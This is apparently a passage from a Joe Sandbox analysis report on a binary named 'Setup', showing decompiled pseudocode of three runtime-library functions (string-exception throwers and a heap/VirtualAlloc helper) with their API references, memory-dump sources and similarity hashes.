                                                                                                                                                              						 *(_t42 + 4) =  *(_t42 + 4) & 0x00000000;
                                                                                                                                                              						_t21 = _t42 + 8;
                                                                                                                                                              						 *_t21 =  *(_t42 + 8) & 0x00000000;
                                                                                                                                                              						__eflags =  *_t21;
                                                                                                                                                              						 *_t42 = 0x51bc00;
                                                                                                                                                              						return _t42;
                                                                                                                                                              					} else {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					L11:
                                                                                                                                                              				}
                                                                                                                                                              				return _t37;
                                                                                                                                                              				goto L11;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0044F649
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0044F674
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                                              • String ID: string too long
                                                                                                                                                              • API String ID: 1961742612-2556327735
                                                                                                                                                              • Opcode ID: 0d2da4726461649e821c7cc043b2f499f67cff6a2130653a1fe2c0e11d901b1d
                                                                                                                                                              • Instruction ID: 67ae62e1f2c81d8f8597e4a67a4f88d5809dd61757c1dccfe68e006e076641f1
                                                                                                                                                              • Opcode Fuzzy Hash: 0d2da4726461649e821c7cc043b2f499f67cff6a2130653a1fe2c0e11d901b1d
                                                                                                                                                              • Instruction Fuzzy Hash: 93D0127195020897DB04EAD1CC52BDDB778BB1431EF40041AA60177086DBBC5648CB28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0044F67A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				intOrPtr _v0;
                                                                                                                                                              				signed int _v4;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				char _v80;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				signed int _t25;
                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				void* _t46;
                                                                                                                                                              
                                                                                                                                                              				_t41 = __edi;
                                                                                                                                                              				_t32 = __ebx;
                                                                                                                                                              				_push(0x44);
                                                                                                                                                              				E00456E7E(0x505398, __ebx, __edi, __esi);
                                                                                                                                                              				E004134D0( &_v40, "invalid string position");
                                                                                                                                                              				_v4 = _v4 & 0x00000000;
                                                                                                                                                              				E00413210( &_v40);
                                                                                                                                                              				E00456A4C( &_v80, 0x544adc);
                                                                                                                                                              				asm("int3");
                                                                                                                                                              				_t46 = _t44;
                                                                                                                                                              				_push(_t46);
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t24 = E0044FBD9(_t32, _t40, _t41, _v0); // executed
                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t25 = E00456FFC(_v0);
                                                                                                                                                              					__eflags = _t25;
                                                                                                                                                              					if(_t25 == 0) {
                                                                                                                                                              						__eflags =  *0x5bc914 & 0x00000001;
                                                                                                                                                              						if(( *0x5bc914 & 0x00000001) == 0) {
                                                                                                                                                              							 *0x5bc914 =  *0x5bc914 | 0x00000001;
                                                                                                                                                              							__eflags =  *0x5bc914;
                                                                                                                                                              							E0044F754(0x5bc908);
                                                                                                                                                              							E0044FAE5( *0x5bc914, 0x51a041);
                                                                                                                                                              						}
                                                                                                                                                              						E00417C20(0x5bc908);
                                                                                                                                                              						E00456A4C( &_v20, 0x544b88);
                                                                                                                                                              						asm("int3");
                                                                                                                                                              						_t29 =  &_v20;
                                                                                                                                                              						 *(_t29 + 4) =  *(_t29 + 4) & 0x00000000;
                                                                                                                                                              						_t15 = _t29 + 8;
                                                                                                                                                              						 *_t15 =  *(_t29 + 8) & 0x00000000;
                                                                                                                                                              						__eflags =  *_t15;
                                                                                                                                                              						 *_t29 = 0x51bc00;
                                                                                                                                                              						return _t29;
                                                                                                                                                              					} else {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					L10:
                                                                                                                                                              				}
                                                                                                                                                              				return _t24;
                                                                                                                                                              				goto L10;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0044F681
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0044F6AC
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              Strings
                                                                                                                                                              • invalid string position, xrefs: 0044F686
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                              • API String ID: 1961742612-1799206989
                                                                                                                                                              • Opcode ID: 41e8345944dceef866e9bcd104b2444109eab020c7f016eb326f7da1192036a1
                                                                                                                                                              • Instruction ID: add6abddfee71d70b86efe27a181920542ec3159fd15ba36859697a7e8980588
                                                                                                                                                              • Opcode Fuzzy Hash: 41e8345944dceef866e9bcd104b2444109eab020c7f016eb326f7da1192036a1
                                                                                                                                                              • Instruction Fuzzy Hash: 55D012719402089BDB04EAD1CC42BDD7778BB1431AF40041AA50177086DBB95A48CA18
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                              			E0044F341() {
                                                                                                                                                              				intOrPtr _t1;
                                                                                                                                                              				void* _t2;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              
                                                                                                                                                              				if( *0x5bc840 != 0 || E0044F1DA() != 0) {
                                                                                                                                                              					_t1 =  *0x5bc840; // 0x0
                                                                                                                                                              					if(_t1 != 1) {
                                                                                                                                                              						_t2 =  *0x5bc848(_t1);
                                                                                                                                                              						if(_t2 != 0) {
                                                                                                                                                              							return _t2;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t18 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
                                                                                                                                                              							if(_t18 != 0) {
                                                                                                                                                              								_push( *0x5bc840);
                                                                                                                                                              								if( *0x5bc848() == 0) {
                                                                                                                                                              									_t16 = _t18;
                                                                                                                                                              									_t19 = _t18 + 0xff0;
                                                                                                                                                              									do {
                                                                                                                                                              										 *0x5bc844( *0x5bc840, _t16);
                                                                                                                                                              										_t16 = _t16 + 0x10;
                                                                                                                                                              									} while (_t16 < _t19);
                                                                                                                                                              									L13:
                                                                                                                                                              									return _t16;
                                                                                                                                                              								}
                                                                                                                                                              								VirtualFree(_t18, 0, 0x8000);
                                                                                                                                                              								goto L13;
                                                                                                                                                              							}
                                                                                                                                                              							goto L8;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						_t12 = HeapAlloc(GetProcessHeap(), 0, 0xd);
                                                                                                                                                              						if(_t12 == 0) {
                                                                                                                                                              							goto L8;
                                                                                                                                                              						} else {
                                                                                                                                                              							return _t12;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					L8:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000D,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F2C2
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F2C9
                                                                                                                                                                • Part of subcall function 0044F1DA: IsProcessorFeaturePresent.KERNEL32(0000000C,0044F2B0,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F1DC
                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F2EB
                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F318
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocHeapVirtual$FeatureFreePresentProcessProcessor
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4058086966-0
                                                                                                                                                              • Opcode ID: 16e7b19f690fbd505acd56a4ef34f332f60cb3ca9fddfb0f5a395bba0b016975
                                                                                                                                                              • Instruction ID: bba78e7b3f5f76ffbaaea230f02ad9ca1bdd40546a675a28c4d26747fd10df00
                                                                                                                                                              • Opcode Fuzzy Hash: 16e7b19f690fbd505acd56a4ef34f332f60cb3ca9fddfb0f5a395bba0b016975
                                                                                                                                                              • Instruction Fuzzy Hash: E301F53524021167F7711B6CBC18F6B3AA5FBA0711F1602B2F904D72A0DB69EC4DA66C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%